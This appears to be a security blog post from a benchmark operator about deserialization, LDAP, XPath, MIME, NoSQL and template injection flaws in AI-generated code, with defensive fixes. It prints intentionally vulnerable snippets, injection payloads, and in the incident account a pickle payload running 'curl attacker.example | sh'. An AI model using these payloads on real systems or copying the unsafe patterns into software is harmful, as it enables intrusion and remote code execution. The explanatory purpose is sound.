INSECURE DESERIALIZATION AND LONG-TAIL INJECTIONS
SQL injection gets all the press. The other injection classes are still alive and well in AI-generated code, and the model frequently picks the unsafe primitive because the safe one is more verbose.
The scenario referenced below runs on gapbench.vibe-eval.com — a public security benchmark we operate.
The injection family beyond SQL
SQL injection has a brand. People know about it. Frameworks default to parameterized queries. Most AI-generated SQL is, accidentally, safe — because Prisma, Drizzle, and the modern ORMs make the safe path the default.
The injection family beyond SQL is less famous and less defaulted-safe. Pickle, LDAP, XPath, MIME, NoSQL, template engines (SSTI). Each has its own gotcha. AI generators reproduce them because the safe pattern requires knowing about the unsafe pattern, and the unsafe pattern is shorter.
I’ll cover four; gapbench has more.
Insecure deserialization
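import pickle
from flask import Flask, jsonify, request

app = Flask(__name__)

@app.route('/restore', methods=['POST'])
def restore():
    # UNSAFE: unpickles attacker-controlled request bytes
    data = pickle.loads(request.data)
    return jsonify(restored=str(data))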
pickle.loads will execute arbitrary code from a crafted byte string. Generating the payload is easy: ysoserial covers Java, and in Python a class with a custom __reduce__ method is enough. Send the payload, code runs.
The fix: don’t use pickle for untrusted input. Use JSON. If you specifically need pickle for performance reasons, sign the payload (HMAC) and verify before deserializing — and even then, prefer not to.
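A minimal sketch of the sign-then-verify step, assuming JSON as the payload format and a server-side secret. SECRET_KEY, sign_blob, and load_verified are hypothetical names for illustration, not part of any library.

```python
import hashlib
import hmac
import json

# Placeholder secret for illustration; load a real key from your secret store.
SECRET_KEY = b"replace-me"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes

def sign_blob(obj) -> bytes:
    """Serialize obj as JSON and prepend an HMAC-SHA256 tag."""
    body = json.dumps(obj, sort_keys=True).encode("utf-8")
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    return tag + body

def load_verified(blob: bytes):
    """Check the tag first; only parse the body if it matches."""
    tag, body = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch; refusing to deserialize")
    return json.loads(body)
```

A signature only proves the bytes came from someone holding the key. If users can get the server to sign content they control, wrapping pickle this way still hands them code execution, which is why JSON is the body format here.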
Same shape applies to:
- Java ObjectInputStream: use Jackson or similar with explicit type allow-lists.
- PHP unserialize: avoid for untrusted input; use json_decode.
- Ruby Marshal.load: avoid; use JSON.
- .NET BinaryFormatter: Microsoft has explicitly deprecated this for the same reason.
Live: https://gapbench.vibe-eval.com/site/insecure-deser/.
LDAP filter injection
filter = f"(uid={username})"
results = ldap_client.search(base_dn, ldap.SCOPE_SUBTREE, filter)
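Username = *)(uid=*. The filter becomes (uid=*)(uid=*): the format string’s closing ) completes the injected second filter, leaving two well-formed filters back to back. Strict servers and libraries reject that as malformed; lenient ones may evaluate only the first, (uid=*), and match all users. With more creative payloads, such as *)(|(password=*), the attacker can probe attributes.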
Fix: escape LDAP special characters ((, ), *, \, NUL) in user input before interpolating, or use a parameterized API if your LDAP library has one.
Live: https://gapbench.vibe-eval.com/site/ldap-injection/.
XPath tautology
const query = `//users/user[username='${input}' and password='${pass}']`
const result = xmlDoc.evaluate(query, ...)
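Username = ' or '1'='1. The query becomes //users/user[username='' or '1'='1' and password='']. Because and binds tighter than or in XPath, this alone matches only users with an empty username or an empty password; sending the same payload in the password field as well makes the predicate true for every user, and the application typically logs in as the first match. With more creativity, the attacker reads arbitrary XML content.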
Fix: use parameterized XPath where the library supports variable bindings (for example javax.xml.xpath with an XPathVariableResolver, or lxml’s keyword variables), or escape user input. Don’t concatenate.
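Where variable bindings aren’t available, one option is to avoid building a query from input at all. The sketch below is that swapped-in approach, not parameterized XPath: the standard library’s ElementTree supports only a limited XPath subset, so it walks the user elements and compares values as data. USERS_XML and find_user are hypothetical, and the plaintext passwords simply mirror the query above.

```python
import xml.etree.ElementTree as ET

# Hypothetical user store, shaped like the //users/user query above.
USERS_XML = """
<users>
  <user><username>alice</username><password>s3cret</password></user>
  <user><username>bob</username><password>hunter2</password></user>
</users>
"""

def find_user(root, username: str, password: str):
    """Return the matching <user> element, or None.

    User input is compared as data; it is never spliced into a query string.
    """
    for user in root.iterfind("user"):
        if (user.findtext("username", "") == username
                and user.findtext("password", "") == password):
            return user
    return None

root = ET.fromstring(USERS_XML)
```

With this shape, the tautology payload is just a username that nobody has.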
Live: https://gapbench.vibe-eval.com/site/xpath-injection/.
SMTP MIME injection
def send_email(to, subject, body):
    msg = f"To: {to}\r\nSubject: {subject}\r\nFrom: noreply@example.com\r\n\r\n{body}"
    smtp.sendmail(...)
To = victim@example.com\r\nBcc: attacker@example.com. The attacker is now BCC’d on every email sent to that address. Or the attacker can inject Subject: Free iPad\r\n\r\nClick here to claim to send their own emails through your service.
Fix: use a proper email library (Python’s email.message.EmailMessage, nodemailer, etc.) that handles MIME structure correctly. Validate that user-supplied addresses don’t contain \r or \n.
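A minimal sketch of that fix using the standard library’s email.message.EmailMessage. build_message is a hypothetical helper; the explicit CR/LF check is there so the rejection doesn’t depend on library internals.

```python
from email.message import EmailMessage

def build_message(to: str, subject: str, body: str) -> EmailMessage:
    """Build a message, rejecting header values that contain CR or LF."""
    for label, value in (("to", to), ("subject", subject)):
        if "\r" in value or "\n" in value:
            raise ValueError(f"{label} contains a line break")
    msg = EmailMessage()
    msg["To"] = to
    msg["Subject"] = subject
    msg["From"] = "noreply@example.com"
    msg.set_content(body)  # the body is a MIME part, not a spliced string
    return msg
```

The resulting object can be handed to smtplib’s SMTP.send_message, which takes the message object rather than a hand-assembled string.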
Live: https://gapbench.vibe-eval.com/site/email-mime-injection/.
Bonus mentions
For completeness, these have their own scenarios:
- SQL injection at /site/sqli-raw/. Yes, AI still produces raw SQL with string concatenation, especially in code that mixes ORM calls with “just one quick raw query.”
- NoSQL injection at /site/nosql-injection/. Mongo’s $where and operator-based query injection, such as { username: { $ne: null } } to bypass auth.
- Server-Side Template Injection at /site/ssti/. Concatenating user input into a Jinja2/Handlebars/etc. template that the engine evaluates.
The shape is the same across all of them: build a query/template/filter from user input without escaping or parameterization, and the user gets to control the structure. The fix is the same: parameterize.
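For the NoSQL case there is no string to escape: the structure arrives as a parsed JSON object. The equivalent of parameterizing is a type check before the value reaches the query. A sketch, assuming a parsed request body; login_filter is a hypothetical helper and no database driver is involved.

```python
def login_filter(payload: dict) -> dict:
    """Build a Mongo-style equality filter from a parsed JSON body.

    Rejects anything that is not a plain string, so an operator document
    such as {"$ne": None} cannot stand in for a value.
    """
    username = payload.get("username")
    if not isinstance(username, str):
        raise TypeError("username must be a string")
    # "$eq" pins the comparison to equality on a literal value.
    return {"username": {"$eq": username}}
```

The returned dict is what you would pass to the driver’s lookup call; the password check belongs in application code against a stored hash, not in the filter.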
A specific incident — pickle to RCE
Anonymized. A Python data-science SaaS had a feature where users could “save and share their workspace state.” Workspace state was a complex object graph — pandas DataFrames, scikit-learn models, custom transformer classes. The team’s serialization choice: pickle, because it round-trips arbitrary Python objects and JSON wouldn’t.
The save endpoint pickled the workspace state and stored it in S3. The load endpoint pulled the bytes and unpickled. Both endpoints were authenticated.
The bug was that “shared” workspaces — a feature added later — let one user load another user’s pickle. The receiving user didn’t know whose pickle they were loading. An attacker registered, pickled a workspace state containing __reduce__ magic that runs os.system('curl attacker.example | sh') on unpickle, shared it with target users, and waited for them to click the share link.
Three users clicked. Three RCEs. The malicious pickle ran inside the SaaS’s worker, which had access to the S3 bucket and to a few internal services. The attacker pivoted from worker access to S3-write to the team’s container registry, pushed a malicious image, and waited for the next deploy.
The cleanup was extensive. Disable pickle entirely; migrate workspace serialization to a custom JSON-based format that explicitly lists allowed types. Audit S3 for malicious files. Re-deploy from a known-good registry image. Rotate every credential the worker had touched.
The lesson, and it is the lesson for every variant of insecure deserialization: pickle (and Java ObjectInputStream, and PHP unserialize, and Ruby Marshal) is RCE-by-design when used on untrusted input. It’s not a “this could be exploited” — it’s a “this is how the format is intended to work.” If you have user input flowing into pickle.loads, you have RCE. The fix is “don’t use pickle for user input.”
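To make “intended to work” concrete, here is a harmless demonstration of the mechanism. It uses os.getcwd as a stand-in for the os.system call in the incident; Demo is a hypothetical class.

```python
import os
import pickle

class Demo:
    # pickle calls __reduce__ when serializing; the (callable, args) pair it
    # returns is what pickle.loads invokes when deserializing.
    def __reduce__(self):
        return (os.getcwd, ())  # harmless stand-in for os.system(...)

payload = pickle.dumps(Demo())

# No Demo instance comes back: the result is whatever the callable returned.
result = pickle.loads(payload)
```

The bytes name a callable and its arguments, and the loader calls it. Nothing about the receiving code needs to be buggy for this to work.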
What “untrusted” means in this context
Untrusted = anyone who is not the same trust principal as the code reading the data. In practice:
- Data from a different user, even an authenticated one — untrusted relative to the receiving user
- Data from your own database — untrusted if the database’s contents are influenced by user actions
- Data from an external API — untrusted relative to your service
- Data from cache — only as trusted as whoever can write to the cache
- Data from a file — only as trusted as the file’s source
The general rule: deserialize untrusted input only with formats that don’t allow code execution. JSON, MessagePack, Protobuf, Avro, CBOR are safe. Pickle, ObjectInputStream, unserialize, Marshal, BinaryFormatter, YAML (with some loaders) are not.
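A data-only format still needs a way to rebuild typed objects. One sketch of a JSON envelope with an explicit type allow-list, in the spirit of the migration described in the incident; Point, Label, ALLOWED_TYPES, and the {"type", "data"} envelope are all assumptions made for illustration.

```python
import json
from dataclasses import dataclass

@dataclass
class Point:
    x: float
    y: float

@dataclass
class Label:
    text: str

# Only types named here can ever be constructed from input.
ALLOWED_TYPES = {"point": Point, "label": Label}

def decode(raw: str):
    """Parse a {"type": ..., "data": {...}} envelope into an allow-listed type."""
    envelope = json.loads(raw)
    if not isinstance(envelope, dict):
        raise ValueError("expected a JSON object")
    type_name = str(envelope.get("type"))
    cls = ALLOWED_TYPES.get(type_name)
    if cls is None:
        raise ValueError(f"type {type_name!r} is not on the allow-list")
    return cls(**envelope["data"])
```

The input picks a key in a table the server wrote; it never names a class or function directly.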
An LDAP injection deep-dive
LDAP injection is less common than SQL injection but more catastrophic when it lands, because LDAP is often the auth backend for the entire org.
# WRONG: f-string interpolation
filter = f"(uid={username})"
# username = "*)(uid=*"
# filter   = "(uid=*)(uid=*)"
# Lenient LDAP servers may evaluate only the first filter, (uid=*), which matches every entry

# WRONG: incomplete escaping
def escape(s):
    return s.replace('(', '\\28').replace(')', '\\29')
# Misses: *, NUL byte, and the backslash itself

# RIGHT: full LDAP escape per RFC 4515
def ldap_escape(s):
    table = str.maketrans({
        '\\': r'\5c',
        '*': r'\2a',
        '(': r'\28',
        ')': r'\29',
        '\x00': r'\00',
    })
    return s.translate(table)

filter = f"(uid={ldap_escape(username)})"

# BETTER: use the library's own helper where one exists
# python-ldap: ldap.filter.filter_format / escape_filter_chars
# ldap3: ldap3.utils.conv.escape_filter_chars
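To see what RFC 4515 escaping does to the payloads from earlier, here is a self-contained sketch with no LDAP library involved. uid_filter is a hypothetical helper that acts as the single place the filter string is assembled.

```python
def ldap_escape(value: str) -> str:
    """Escape the RFC 4515 filter specials in a single pass."""
    return value.translate(str.maketrans({
        "\\": r"\5c",
        "*": r"\2a",
        "(": r"\28",
        ")": r"\29",
        "\x00": r"\00",
    }))

def uid_filter(username: str) -> str:
    # Hypothetical helper: the only place the filter string is assembled.
    return f"(uid={ldap_escape(username)})"

for payload in ["alice", "*)(uid=*", "*)(|(password=*)"]:
    print(uid_filter(payload))
```

str.translate maps each input character once, so the backslashes introduced by the escapes are not escaped again. A chain of .replace calls would have to handle the backslash first to get the same result.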
XPath, LDAP, and email MIME — common shape
All three injection classes share a structure: the application builds a query/filter/header from user input via string concatenation, and special characters in the input change the query’s meaning. The defense is identical in shape — escape per the format’s spec, or use a parameterized API.
The bugs persist because:
- The “escape function” is rarely in the standard library and is finicky to write correctly.
- Parameterized APIs exist but require more setup than string concatenation.
- AI codegen reaches for the shorter pattern, which is the unsafe one.
Cross-stack notes
The same general advice (use a safe deserializer; use parameterized queries; sanitize injection inputs) applies in every stack. The libraries that make the right pattern easy:
- Python: defusedxml for XML; defusedjson is unnecessary (JSON is safe); pyyaml with safe_load (not load); pickle should be avoided for untrusted input.
- Java: Jackson with default typing left off, or, where polymorphism is required, activateDefaultTyping with a PolymorphicTypeValidator allow-list. Avoid ObjectInputStream.
- Ruby: JSON.parse is safe. YAML.safe_load exists and should be used instead of YAML.load.
- PHP: json_decode is safe. unserialize should not see untrusted input.
- .NET: Newtonsoft.Json is safe with its default TypeNameHandling.None. BinaryFormatter is deprecated by Microsoft for security reasons.
How we detect
For each injection family we have a payload set:
- Deser: probe with format-specific exploit payloads (pickle, Java) and observe whether code execution markers appear server-side.
- LDAP: probe with *)(uid=*) and similar payloads, observe whether response data widens unexpectedly.
- XPath: probe with ' or '1'='1 payloads against query endpoints, observe whether responses include unexpected data.
- MIME: probe with CRLF-in-address payloads, observe whether emails get sent to unexpected destinations.
All runtime. The static scanner story is partial — it can flag the unsafe library calls (pickle.loads, raw f-string LDAP filters, etc.) but can’t confirm exploitability without the request.
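As a toy illustration of the static half (not the scanner itself), flagging unsafe library calls can be as small as a walk over the syntax tree. UNSAFE_CALLS, dotted_name, and find_unsafe_calls are hypothetical names, and the call list is deliberately short.

```python
import ast

# Dotted call names to flag; extend for other unsafe primitives.
UNSAFE_CALLS = {"pickle.loads", "pickle.load", "marshal.loads"}

def dotted_name(node: ast.AST) -> str:
    """Render simple attribute chains like pickle.loads as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return f"{dotted_name(node.value)}.{node.attr}"
    return ""

def find_unsafe_calls(source: str):
    """Return (line, name) for each call whose dotted name is in UNSAFE_CALLS."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in UNSAFE_CALLS:
                hits.append((node.lineno, name))
    return sorted(hits)
```

This misses aliased imports such as from pickle import loads, and a hit says nothing about whether the argument is attacker-controlled. That gap is the reason the runtime probes do the confirming.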
CWE / OWASP
- CWE-502 — Deserialization of Untrusted Data
- CWE-90 — Improper Neutralization of Special Elements used in an LDAP Query
- CWE-643 — Improper Neutralization of Data within XPath Expressions
- CWE-93 — Improper Neutralization of CRLF Sequences (MIME)
- OWASP Top 10 — A03:2021 Injection, A08:2021 Software and Data Integrity Failures
Reproduce it yourself
- Insecure deserialization: https://gapbench.vibe-eval.com/site/insecure-deser/
- LDAP injection: https://gapbench.vibe-eval.com/site/ldap-injection/
- XPath injection: https://gapbench.vibe-eval.com/site/xpath-injection/
- Email MIME injection: https://gapbench.vibe-eval.com/site/email-mime-injection/
- SQL injection: https://gapbench.vibe-eval.com/site/sqli-raw/
- NoSQL injection: https://gapbench.vibe-eval.com/site/nosql-injection/
- Template injection (SSTI): https://gapbench.vibe-eval.com/site/ssti/
Related reading
- Pattern: Mass assignment
- Pattern: BOLA in AI-generated CRUD
- Tool: vibe-code-scanner